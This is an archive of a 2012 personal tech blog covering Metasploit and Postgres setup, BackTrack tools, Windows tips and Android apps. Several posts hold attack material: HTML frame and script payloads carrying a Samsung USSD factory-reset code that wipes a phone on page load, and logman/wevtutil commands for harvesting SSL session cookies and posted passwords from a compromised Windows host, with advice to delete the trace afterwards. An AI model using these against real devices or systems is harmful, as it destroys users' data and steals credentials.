Dec 4, 2012

AppScan Policies

IBM Security AppScan is an automated dynamic security testing tool. It runs various tests that probe for known vulnerabilities and weaknesses and formats the results into reports to help you understand the vulnerabilities in your applications.

AppScan comes with nine (9) predefined policies. Below summarizes the types of tests that are included in each predefined policy.

Test Policy Categories

Oct 16, 2012

Metasploit and Postgres Setup

Here are some notes that I took to setup my msf and postgres.

Starting Postgres

rt@bt:$ sudo -s
rt@bt:$ postgresql-setup initdb
rt@bt:$ systemctl start postgresql.service


Creating a database user

postgres@bt:$ createuser msf_user -P
Enter password for new role: <btpassword>
Enter it again: <btpassword>
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n


Creating a database
postgres@bt:$ createdb --owner=msf_user msf_database


Configure Metasploit
rt@bt:$ msfconsole
msf > db_status
[*] postgresql selected, no connection
msf> db_connect msf_user:btpassword@127.0.0.1:5432/msf_database
NOTICE:  CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
[..]
NOTICE:  CREATE TABLE will create implicit sequence "mod_refs_id_seq" for serial column "mod_refs.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "mod_refs_pkey" for table "mod_refs"

Enable the database on startup
This is to write the database configuration to a separate configuration file so the password doesn't get printed on the screen during each start of the msfconsole.
$ cat > /opt/metasploit-framework/database.yml << EOF
production:
    adapter: postgresql
    database: msf_database
    username: msf_user
    password: yourmsfpassword
    host: 127.0.0.1
    port: 5432
    pool: 75
    timeout: 5
EOF
Database connection and Workspace
$ cat > ~/.msf4/msfconsole.rc << EOF
db_connect -y /opt/metasploit4/config/database.yml
workspace -a YourProject
EOF


Using the database
msf > db_status
[*] postgresql connected to msf_database
msf > db_nmap 192.168.1.0/24
msf > hosts
Hosts
=====
address        mac                name       os_name  os_flavor  os_sp  purpose  info  comments
-------        ---                ----       -------  ---------  -----  -------  ----  --------
192.168.1.1    11:22:33:44:55:66  router     Linux    2.6.X             device        
192.168.1.100  22:33:44:55:66:77  mixer      Linux    2.6.X             device         
msf > help database
Database Backend Commands
=========================
    Command        Description
    -------        -----------
    creds          List all credentials in the database
    db_connect     Connect to an existing database
    db_disconnect  Disconnect from the current database instance
    db_export      Export a file containing the contents of the database
    db_import      Import a scan result file (filetype will be auto-detected)
    db_nmap        Executes nmap and records the output automatically
    db_status      Show the current database status
    hosts          List all hosts in the database
    loot           List all loot in the database
    notes          List all notes in the database
    services       List all services in the database
    vulns          List all vulnerabilities in the database
    workspace      Switch between database workspaces
To list databases

postgres@bt:$ psql -l

To assign ownership of a database
postgres@bt:$ psql -c "ALTER DATABASE msf_database OWNER TO msf_user;" 

To add or change the password for a user
postgres@bt:$ psql -c "ALTER USER msf_user WITH ENCRYPTED PASSWORD 'omgwtfbbq';" 

To drop a database
postgres@bt:$ dropdb msf_database

To drop a user
postgres@bt:$ dropuser msf_user
psql commands
select version(); - show the db version
\h - get help
\q - quit







Oct 13, 2012

Setting Up Metasploit Framework

I just setup my Metasploit Framework on my Ubuntu 12.04 (LTS). Below is the note of what I have been busy with recently.

Installing the dependencies

sudo apt-get update
sudo apt-get upgrade
sudo apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev subversion openjdk-7-jre git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev ruby1.9.3
sudo gem install wirble msgpack sqlite3 pg activerecord nokogiri

Installing NMAP

mkdir ~/Development
cd ~/Development
svn co https://svn.nmap.org/nmap
cd nmap
./configure
make
sudo make install
make clean

Setting up Postgres SQL Server

sudo -s
su postgres
createuser msf -P -S -R -D
createdb -O msf msf
exit
exit

Installing Metasploit Framework

cd /opt
sudo svn co https://www.metasploit.com/svn/framework3/trunk metasploit-framework
cd metasploit-framework
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'
sudo ln -s /opt/metasploit-framework/armitage /usr/local/bin/armitage
cd /opt/metasploit-framework/
cat > database.yml << EOF
>production:
>   adapter: postgresql
>   database: msf
>   username: msf
>   password:
>   host: 127.0.0.1
>   port: 5432
>   pool: 75
>   timeout: 5
>EOF 

sudo echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/database.yml >> /etc/profile
source /etc/profile

cd /opt/metasploit-framework/external/pcaprub
sudo ruby extconf.rb && sudo make && sudo make install

First Run

msfconsole

Oct 10, 2012

Black Screen when Remote Desktop Connection (RDC)

This morning, I connect to my remote server (windows 7 64-bit) via RDC (Remote Desktop Connection) as usual (after VPN authentication). And I get a "blank/black screen" after I key my login credential.

After a Google search, I found the solution to this. In case you have the similar issue, just hit Ctrl-Alt-End on the black screen to bring the Task Manager up. Problem solved!!

Oct 5, 2012

Introducing FakeNet


FakeNet is Windows network simulation tool designed for malware analysis. It redirects all traffic leaving a machine to the localhost (including hard-coded IP traffic and DNS traffic) and implements several protocols to ensure that malicious code continues to execute and can be observed by an analyst.

The tool supports DNS, HTTP, and SSL protocols and provides a python extension interface for implementing new or custom protocols. It also the capability to listen for traffic to any port as well as create packet capture on the localhost.

Right now the tool only supports WinXP Service Pack 3. The tool runs fine on Windows Vista/7 although certain features will be automatically disabled.

Links:


Oct 2, 2012

EXEInfo PE

Here's a new tool that I discovered recently that able to identify common packers. It is similar to PEiD that I used.

Goto http://www.exeinfo.antserve.com/ to get a freeware copy.

Sep 30, 2012

Unicode Filename in Windows 7

Today, out of sudden, my Windows 7 seems does not display unicode filename anymore in Windows Explorer. It doesn't help even I reboot my laptop multiple times.

After searching on the web, it seems like to solution is simple.

  1. Goto c:\windows\fonts
  2. Right click on the "Ming Liu" font and choose "Show".
  3. Reboot.
In order to prevent it happens again in the future:
  • From "Start", type "control" to open the "Control Panel".
  • At the top-right search box, type "fonts".
  • Choose "View installed fonts".
  • At the left pane, choose "Font settings".
  • Uncheck "Hide fonts based on language settings".

Sep 25, 2012

Wipe out/Factory Reset Samsung Android’s Phones


A major security vulnerability has been disclosed at the Ekoparty 2012 Security Conference which affects Samsung Android handsets.

It it is possible to reset those handsets to factory default settings and in the process wipe out all data. This vulnerability exploits a “secret” code (actually is USSD code) that can be used to trigger the factory reset automatically, without asking any confirmation from the user. That code is: *2767*3855#

There are different methods known to date to push that code onto those handsets:

  • SMS in Wap Push mode (where the user would have to click on a link)
  • QR Code
  • NFC Protocol

Or… if users go to some websites where either
<frame src="tel:*2767*3855%23" />
or
<script>document.location="tel:*2767*3855%23";</script>
is contained in the HTML page.

So far, it has been confirmed to work against the Samsung Galaxy S3, the Galaxy Beam, S Advance, Galaxy Ace and Galaxy S II and some HTC devices.

Sep 19, 2012

Data Mining Event Tracing for Windows 3

This is continue from the previous 2 posts.

The netsh utility has an interface to enable/disable event tracing for all providers that participate in a given "Scenario". You can tell it you want to use "All" scenarios which enables logging for a large number of providers at the same time.

To start/stop the trace session:

C:\temp>netsh trace start scenario=all tracefile=FIREEVERYTHING2.etl capture=yes correlation=yes
Trace configuration:-------------------------------------------------------------------Status:             RunningTrace File:         FIREEVERYTHING2.etlAppend:             OffCircular:           OnMax Size:           250 MBReport:             Off

C:\temp>netsh trace stopCorrelating traces ... doneGenerating data collection ... doneThe trace file and additional troubleshooting information have been compiled as "C:\temp\FIREEVERYTHING2.cab".File location = C:\temp\FIREEVERYTHING2.etlTracing session was successfully stopped.


The netsh utility correlates "like events" and generates several log file and reports containing some interesting data.

As expected we have our "FIREEVERYTHING2.etl" file that we can query with wevtutil.exe. This file will have the information recorded from by multiple providers and has all kinds of interesting data in it. But there is also a .CAB file that is worth checking out.

To check on human readable content:
C:\temp>wevtutil qe FIREEVERYTHING2.etl /lf:True /f:Text | more


Here is an example of searching for the "passwd" field in a gmail.com POST with and without the /f:Text option. With /f:Text it finds zero occurrence, but without it finds two.
C:\temp>wevtutil qe FIREEVERYTHING2.etl /lf:True /f:Text | find /c /i "passwd"0C:\temp>wevtutil qe FIREEVERYTHING2.etl /lf:True | find /c /i "passwd"2

These logs are not just recording actions taken by built in programs like Internet Explorer. Any third party tools that rely on the ETW enabled APIs will also have their information recorded. So fire up the logging and go on a little treasure hunt!

Sep 18, 2012

Data Mining Event Tracing for Windows 2

This is continue from the previous post.

The logman utility can allow us to peer into and established SSL session and steal active session cookies after you have shell on a box.

If you do able to sniff the administrator credential, then you can evenenable logging on a remote host using "logman -s <computername>".

The Microsoft-Window-WinInet is only 1 of the providers that you can turn on the logging. To check the full list of providers in your computer, you can:
c:\temp>logman query providers > listofproviders.txt

C:\temp>type listofproviders.txt | find /c "{"
643


This means there are total of 643 providers available in my computer.

Sep 17, 2012

Data Mining Event Tracing for Windows

>>>> From http://pauldotcom.com/wiki/index.php/Episode300

This is to show how to tap into the data logged by Windows Communication Foundation (WCF) and fed to Event Tracing for Windows (ETW).

The ETW Provider logs excesive amounts of information that may give an attacker access to sensitive data. By tapping into these otherwise silent logging mechnisms an attacker can find all kinds of useful information.

Below is an example to show "Sidejacking SSL Cookies". You can steal the cookies within the encrypted SSL session.

First, turn on the Event Tracing for WinInet.

c:\>cd \tempc:\temp>logman start CookieStealer -p Microsoft-Windows-WinInet -o cookiesteal.etl -ets


From now on, all the WinInet connections and SSL sessions are logged.

To check the cookies:
c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "cookie added"

To check the POST info (including password):
c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "POST"

To check some additional reconnaissance:

c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "hostname"c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "WPAD"c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "DNS Cache"

To turn off your Event logging:

c:\temp>logman stop CookieStealer -ets

And remember to remove your "cookiesteal.etl" file.



Aug 16, 2012

Upgrading BackTrack 5 R2 to BackTrack 5 R3 now

BackTrack 5 R3 released on Aug 13, 2012. I'm upgrading my laptop from BackTrack 5 R2 to BackTrack 5 R3 now. Here's how I do it:
  1. apt-get update && apt-get dist-upgrade
  2. apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

Jul 30, 2012

Obtain Domain Controller list in AD

Here's a quick way to find find out the server name of the AD domain controller on your network.

c:\> nltest /dc:labs.example.org

 

If you are running on a Linux machine, you also can find out the server name and IP address in AD too.

$ nslookup -type=all _ldap._tcp.dc._msdcs.labs.example.org

$ dig @dns1.example.org  _ldap._tcp.dc._msdcs.labs.example.org -t srv

$ dig @dns1.example.org  _ldap._tcp.dc._msdcs.labs.example.org -t any


Jul 4, 2012

File and Folder Ending with Period/Dot

This is a small test on NTFS.

Usually there is no way for you to have file or folder name that ends with a "period" or "dot". For example, you create a new folder called "F1.", Windows OS will rename it to "F1".

One day, I save a PDF file to my Windows 7 (64-bit) from SANS (using Chrome), and for some reasons the file is saved as an ending "dot". And I can't open/del/ren/mov the file. I even try to remove the folder that contain the file but still fail.

After a quick search, here's what I found this, http://support.microsoft.com/kb/320081
But to have fun on this, you still can try.

To Create a File or Folder that ends with "dot":
c:\mkdir \\?\c:\folder.
c:\echo test > \\?\c:\file.

To Remove a file or folder that ends with "dot":
c:\rmdir \\?\c:\folder.
c:\del \\?\c:\file.

Basically those files and folders can't be accessed at all. And you can't rename or move them. Have fun!

Jun 1, 2012

Something Went Wrong in Facebook

Sorry, something went wrong
Something is really wrong here, as well as the NASDAQ:FB: Drop all the way from USD 45 (18/5/12) till USD29.60 (31/5/12).

May 21, 2012

AOKP ICS ROM + Matr1x Kernel

I quit from MIUI and switching to AOKP ROM. Now here's what running on my phone:

  • AOKP ICS ROM build 36 - ROM Control.
  • ICS ROM 4.04
  • Matr1x kernel using CFSv19.5 (3.0.30)
AOKP ICS (Build 36) + Matr1x Kernel (cfs v19.5)

May 17, 2012

App List Backup


Very often I switch out different ROMs for testing. Thus I need a simple way to re-download the list of apps from the Market.

App List Backup from Pun Software 

It helps me to save the list of installed apps so I can re-download them from the Market later (on the same or another device). Note that it does not backup my apps or data (settings).

https://play.google.com/store/apps/details?id=com.punsoftware.backup

May 6, 2012

中华万年历/中華萬年曆 + 桌面插件


中華萬年曆 + 桌面插件  From  DannyChou
中華萬年曆,1583年-2099年之間的西曆、農曆、干支歷、國際節日、農曆節氣、節氣查詢功能,也可以添加自己的生日或是紀念日。還提供了黃曆、生理節律等小工具。
中华万年历/中華萬年曆(Chinese Lunar Calendar)是一款基於Google Android手機平台的完全免費的日曆軟體,提供1583年-2099年之間的西曆、農曆、干支歷、國際節日、農曆節氣、節氣查詢功能,支持簡體中文和繁體中文。

中华万年历/中華萬年曆(Chinese Lunar Calendar)桌面插件,配合中華萬年曆使用。

https://play.google.com/store/apps/details?id=com.keenvim.cnCalendar
https://play.google.com/store/apps/details?id=com.keenvim.cnCalendar.Plugin.appwidget

AirDroid

AirDroid From SAND Studio
AirDroid is a fast, free app that lets you wirelessly manage your Android from your desktop browser.

Its features include but not limited to files mgmt, SMS mgmt, apps mgmt, photos mgmt, share clipboard, contact mgmt, ringtones/music mgmt, etc.

The new features include https support, taking screenshot, and a lot more.

https://play.google.com/store/apps/details?id=com.sand.airdroid

AfterFocus


AfterFocus From MotionOne

With AfterFocus, you can create DSLR-style background blurred photo by simply selecting focus area. Also, various filter effects offer you to create the most natural and realistic photo.

Selecting a focus area more precisely, you can achieve more natural and professional image.  Just mark the areas you want, AfterFocus automatically recognizes the focus area precisely even for an object with complex shapes.

https://play.google.com/store/apps/details?id=com.motionone.afterfocus

May 5, 2012

MIUI 2.4.27 + Android ICS 4.0.4

Today, my phone is running on MIUI 2.4.27 and Android ICS 4.0.4. Here's the home screen.
MIUI 2.4.27 + Android ICS 4.0.4

MIUI 2.3.23 + ICS 4.0.3

Back in March 27, 2012, I've abandoned CM9 and move to MIUI. Here's the screenshot of the lockscreen.

MIUI 2.3.23 + ICS 4.0.3

CM9 + ICS 4.0.3

I've upgrade my phone to CM9, running Android 4.0.3 back in March 5, 2012.

CM9 + ICS 4.0.3

May 4, 2012

New Design Template

Hi all.

Due to some unforeseen issue caused by Google, I was not able to update my blog since February. However,  I've found a solution to my problem and I'll continue to update my blog starting this month.

Thank for the support.

--
Jet

Jan 26, 2012

Change IP Address and DNS settings

I've shown how to add multiple IP addresses in Windows 7 before. Today, let's go back to basic.

Set a static IP address on NIC:
netsh interface ip set address name=”Local Area Connection” static 192.168.1.100 255.255.255.0 192.168.1.1


Set to DHCP:
netsh interface ip set address name=”Local Area Connection” source=dhcp


Set the primary DNS and secondary DNS settings:
netsh interface ip set dns name=”Local Area Connection” static 192.168.1.1
netsh interface ip add dns name=”Local Area Connection” 8.8.8.8 index=2


Set the DNS setting to DHCP:
netsh interface ip set dnsservers name=”Local Area Connection” source=dhcp